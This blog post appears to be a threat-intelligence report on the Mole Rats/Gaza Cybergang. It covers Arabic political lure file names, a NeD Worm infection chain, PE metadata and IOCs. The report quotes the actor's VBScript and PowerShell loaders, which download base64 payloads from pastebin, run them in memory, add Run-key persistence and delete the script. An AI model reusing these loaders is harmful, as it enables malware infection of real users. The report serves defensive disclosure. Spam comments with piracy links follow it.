Operation JOKAA(RR)



Operation JOKAA(RR)
Follow Up to Operation Desert Eagle
OSI Actor: Mole Rats / Gaza Cybergang



EXECUTIVE SUMMARY

Operation JOKAA(RR)
Operation JOKAA(RR) looks into the continued activities of the Mole Rats/Gaza Cybergang Threat Actor and their new TTPS. This report builds on their previous activities as found in:

Operation Desert Eagle (Malware_Party)

Gaza Cybergang (Kaspersky SecureList)

Operation Dusty Sky (ClearSky Security)


Author
  • @MalwareParty


Targeting

File Names 
The list of file names (Palestine/Hamas) observed gives us an indication into the targeting/region of this threat actor.


File Name
Translated (Google)
محضر اجتماع الرئيس عباس مع وفد المخابرات المصرية.exe 
Minutes of the meeting of President Abbas with the Egyptian intelligence delegation
رد حركة حماس على ورقة المصالحة المصرية.exe
Hamas' response to the Egyptian reconciliation paper
محضر اجتماع اللجنة التنفيذية لمنظمة التحرير الفلسطينية امس الاربعاء.exe
Minutes of the meeting of the Executive Committee of the Palestine Liberation Organization (PLO) on Wednesday
محضر اجتماع على الهاتف بين رئيس المكتب السياسي لحركة حماس اسماعيل هنية ورئيس المخابرات المصرية.exe
Minutes of a meeting on the phone between the head of the political bureau of Hamas Ismail Haniya and the head of Egyptian intelligence
تعميم خاص للسادة السفراء ..exe
Special circular for Ambassadors ..
محضر اجتماع العمادي مع هنية رئيس حماس امس الاحد .exe
Al - Emadi 's meeting minutes with Haniyeh, Hamas' president on Sunday - GameDownload.exe
محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe
Minutes of a secret meeting between President Abbas and Majid Faraj
قرارات الرئيس عباس بخصوص العقوبات المالية في المحافظات الجنوبية.exe
President Abbas' Decisions Regarding Financial Sanctions in the Southern Governorates
سبب الزيارة العاجلة ولقاء مع وفد دحلان.exe
The reason for the urgent visit and meeting with the delegation of Dahlan
N/A
president abbas with Egyption intelligence.exe
ما سيتم بحثه في اجتماع اللجنة التنفيذية الليلة .. وقرارات حاسمة.exe
What will be discussed at the Executive Committee meeting tonight .. Decisive decisions
محضر مغلق حول إجتماع سيادة الرئيس حول التهدئة.exe
Urgent and quick visit to our delegation to Cairo to discuss matters of substance
التسجيل الصوتي الأصلي.scr
The Original Sound Recording






Dynamic Analysis

Sample Run-through
We will take a look at one of the samples listed above and walk through it. This will demonstrate their heavy use of Pastebin in the installation of their NeD Worm malware.


Sample: 

63afb94147b64c3e6e4add33b1153c3662a00ae73a745a975c939107db94fed0
محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe
Minutes of a secret meeting of President Abbas with Majed Faraj

  1. After detonating the sample, there are 2 call outs observed:
A. DNS Requests:  

            

       


B. URL:
hxxps://upload[.]cat/b68f8a8e5810b6b7?download_token=e10ba4c15f…..

        hxxps://dev-point[.]co/uploads1/8f70287802ec1.jpg


2.  The request for upload[.]cat returns 1.jpg (594b6c2826660c44b97e6ef2158f7143d6476f3d7d2a62a787e2b6e6320af413)



3. Once 1.jpg (really an executable) is run, it makes a request to hxxps://pastebin[.]com/raw/hR1iwmqb



A. Contents of hR1iwmqb:




       B. Another request is made for hxxps://pastebin[.]com/raw/4YqrnhP9 which           returns a base64 blob




4. The base64 blob is then added to the end of “TVqQAAMAAAAEA” (for greater obfuscation)


([Convert]::Frombase64String('T'+'V'+'q'+'Q'+'A'+'A'+'M'+'A'+'A'+'A'+'A'+'E'+'A'+(New-Object System.Net.WebClient).Downloadstring('https://pastebin.com/raw/4YqrnhP9')))



5. Once the Base64 blob is decoded, it becomes an executable file (69fe00eca050b3a8555b30d75eca10697a330fb04021cd36f8d0379ba078f165)

This is the NeD Worm malware that is heavily used by Mole Rats/Gaza Cybergang.


A. Network traffic after running the NeD Worm Sample





B. checktest[.]www1[.]biz Analysis



JOKAA & JOKRR


Taking a closer look at the pastebin users (JOKAA & JOKRR), we can see that the Actor has been active at least from May 17th 2018 - November 11th, 2018.














Looking at JOKRR’s pastebin account we can see the same download/obfuscation technique is being used.
Examining https://pastebin.com/CQuDUFis or “Sen0” we can see the following:


1. Sen0

set Ob123123j0 = CreateObject("Wscr"&"ipt.Shell")
H="Power"&"Shell.exe -windowst"&"yle hidden -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String('TVqQAAMAAAAEAAAA//8AALg'+(New-Object System.Net.WebClient).Downloadstring('https://pastebin.com/raw/RsGQfwhr'))).EntryPoint.invoke($null,$null)"
Ob123123j0.regwrite "HKCU\"&"Software\M"&"icrosoft\Windows\Curr"&"entVersion\R"&"un\Microt", H, "REG_"&"EXPAND_SZ"
Ob123123j0.Run H,0,false
Ob123123j0.Run "cmd.exe /c del " & ChrW(34) & Wscript.scriptfullname & ChrW(34),0,false



2. Base64 Blob




When combined, the following file is created: cb3f646bf0c6e8d2c57e85ac9f60f974



Static Analysis


63afb94147b64c3e6e4add33b1153c3662a00ae73a745a975c939107db94fed0
محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe
Minutes of a secret meeting of President Abbas with Majed Faraj

  1. File Data:
size: 843264

exif:
PEType: PE32
FileTypeExtension: exe
FileSubtype: 0
FileModifyDate: 2018:11:14 14:09:27-05:00
InitializedDataSize: 199680
FileOS: Win32
FileDescription: 
MIMEType: application/octet-stream
FileVersionNumber: 1.1.26.1
ImageVersion: 0.0
InternalName: 
LinkerVersion: 10.0
EntryPoint: 0x902d3
FileFlagsMask: 0x0017
FileFlags: (none)
FileAccessDate: 2018:11:14 14:09:27-05:00
FileSize: 824 kB
ExifToolVersion: 10.13
TimeStamp: 2017:07:15 21:17:33-04:00
FileInodeChangeDate: 2018:11:14 14:09:27-05:00
CharacterSet: Unicode
FileVersion: 1.1.26.01
ObjectFileType: Executable application
UninitializedDataSize: 0
OSVersion: 5.0
MachineType: Intel 386 or later, and compatibles
ProductVersionNumber: 1.1.26.1
FileType: Win32 EXE
CodeSize: 642560
LegalCopyright: 
SubsystemVersion: 5.0
LanguageCode: English (U.S.)
ProductVersion: 1.1.26.01
Subsystem: Windows GUI
ProductName: 

cert:
source file not signed

peinfo: 
Portable Executable Information
Optional Header: 0x400000
Address Of Entry Point: 0x902d3
Required CPU type: IMAGE_FILE_MACHINE_I386
DLL: False
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compile Time: 2017-07-15 21:17:33
Number of RVA and Sizes: 16
Number of Sections: 4

Section VirtualAddress VirtualSize SizeofRawData Entropy MD5
.text 0x1000 0x9cdd1 642560 6.62573962703 ed222528c0af141da47ff8a47c345c52
.rdata 0x9e000 0x23276 144384 4.83349152991 25f8d7882fc2a14d37f5ce858ebb9321
.data 0xc2000 0xa0b8 12800 3.9831618653 ace5eafa538405645cda58c972af5d6c
.rsrc 0xcd000 0xa4a8 42496 6.68424524085 795a4831c0ff1ccd453e35c918f82088

Imported DLLS:
WSOCK32.dll 
WINMM.dll 
VERSION.dll 
COMCTL32.dll 
PSAPI.DLL 
KERNEL32.dll 
USER32.dll 
GDI32.dll 
COMDLG32.dll 
ADVAPI32.dll 
SHELL32.dll 
ole32.dll 
OLEAUT32.dll 

import_hash (all of the downloaders have the same import hash): cae167cd04ec2982fcdb300bc5300e29

links:
hxxps://dev-point[.]co/uploads1/8f70287802ec1.jpg,
hxxps://dev-point[.]co/uploads1/bf538abc25841.jpg,
hxxps://upload[.]cat/013c50d8db8f96c8?download_token=6a79073c5fa2d667b93dfc35ffbb3f50633c0a68895fd8abc7b7704e4b7a6ad1,
hxxps://upload[.]cat/2605ee706f79181a?download_token=6bd9689cdcf7409b09321375e240e87eb8a6f9799727334775b12293d2f467b2,
hxxps://upload[.]cat/2b18311779009229?download_token=376be0dbe979e6bc643466d52a60c11efd8e40f46cb5e80226341f840830c291,
hxxps://upload[.]cat/4e9aeb589dbe7fc5?download_token=bd084e7acc93a63f5cf8116209adc5755d383f0a0bbfb93d9eca123f8fae79a7,
hxxps://upload[.]cat/ee9a67e37167755e?download_token=ad5ce7fb9c69f2602ecffcc5932875ea1c07e51ff11172124d9a1bd5c75dfaf8,


IOCs

454413cc1f53e4ffc061d75b291ee95ddf47cbffee362a8a7231a36f0fd58810
SHA-256
cf6da95903b40f5223e8b61b140e8ce5c6531a8d9b6ca8f3a9f3edb76322587c
SHA-256
ba47914665961eacd3bdaefbb7114cd4e079f5fbc4c83fde8d59ffb1de1ef1bb
SHA-256
2e47fa7872181e46439eca4e57f1557c831e4acbd14d0bbc21b0f6e76b4419e6
SHA-256
8eb0798a16796945040ab6445cad5b6293560548fba0824493c31ba5b88fa450
SHA-256
70daf5b93713bc04a8e9308878dd5fee8fccf7b710c1ad5e4c5d54b487843cf9
SHA-256
97b1203e7897ef7a1444525d4d6907cd82bb99affe8b08c1c3129ec1bb90c115
SHA-256
63afb94147b64c3e6e4add33b1153c3662a00ae73a745a975c939107db94fed0
SHA-256
f3c8adb271756db39adfb8cb7bdf75ef362c07b9c0d9404accbba5d9300aa8d0
SHA-256
6bbe0dab409db47e5afd8a3dbe39f8cd549301063ed97fc2bba7c234745d1ebf
SHA-256
222f43744b3bcbd699b00c997c115a421836ac3b4ec7212793d00fd16b7f7009
SHA-256
1c7f02030470fd0f49219e1f8896c8edc91b1c434d088ddf7629d0533491a4b6
SHA-256
cf20acddb6b3611efad03897fd13ed656d7631d2730034013bf2a852a649ef97
SHA-256
d4082fad3e0cd950c688e40f81231697dd1a0431ad53b6f118fe3c4ca3c80dad
SHA-256
6ea639fa3314c81f79ea4d7316eb010eda9dc242a0e8d52f0a03860694274a92
SHA-256
2297a1b3b5a0f2c461814ccd18441f99f78f2b4c35ab63bb58eb293ef9395d18
SHA-256
69fe00eca050b3a8555b30d75eca10697a330fb04021cd36f8d0379ba078f165
SHA-256
3dcf656db1b22efd59255fafbb330379c244fdd1d04d7409b3a3744bcc76685b
SHA-256
13ab2cbb2f3203e61b255627c251c16a0e5fcce84d2fcee7640d50eacfade00c
SHA-256
c44e13c75dff157604934ca4d1e792b4250f7e0e9206f00e7ff367d62763d6aa
SHA-256
d0760f72983b2b6986e1fe925f5cd353ae93d82abba1d4ece5a535916c148e58
SHA-256
checktest.www1[.]biz
Domain
fulltest.yourtrap[.]com
Domain
wiknet.wikaba[.]com
Domain
microsoft10.compress[.]to
Domain
wiknet.moo[.]com
Domain
a.pomf.cat/sytcqv[.]jpg
URL
rgho[.]st/download/7xbxHjQgk/b7dcd79559c772e8b793f612e8aedab6610821ec/b7dcd79559c772e8b793f612e8aedab6610821ec/WpfPuzzle.jpg
URL
dev-point[.]co/uploads1/3cf111f25b271.jpg
URL
dev-point[.]co/uploads1/4ee1d5a5b0e41.jpg
URL
dev-point[.]co/uploads1/630cdefc4bf41.jpg
URL
pastebin.com/raw/Vr83T9s5
URL
upload[.]cat/0037e96c45ac2098?download_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac
URL
upload[.]cat/1a215d9da8dd9ad1?download_token=032ffdc5d925e9f206c3dfa29e5252b500a743c1e550e8dcfe66db3d2ea26e26
URL
upload[.]cat/9a08bc13e683d330?download_token=90f1ebb4e1f52835f502bea4307686afc1eb1cdee973cef1fb043febb2a92078
URL











Comments

  1. Hello there! I just want to offer you a big thumbs up for your great info you have right here on this post. I'll be coming back to your web site for more soon. Hacking Blogs

    ReplyDelete
  2. thank you for sharing this information with us thank you for sharing about this post I am glad to be here and read this post is so nice to be here
    thepiratebay mirror proxy
    the pirate bay alternatives
    torlock mirror proxy
    torrentz2 mirror proxy

    ReplyDelete

Post a Comment

Popular posts from this blog

Operation Desert Eagle

Word add-in persistence found in the wild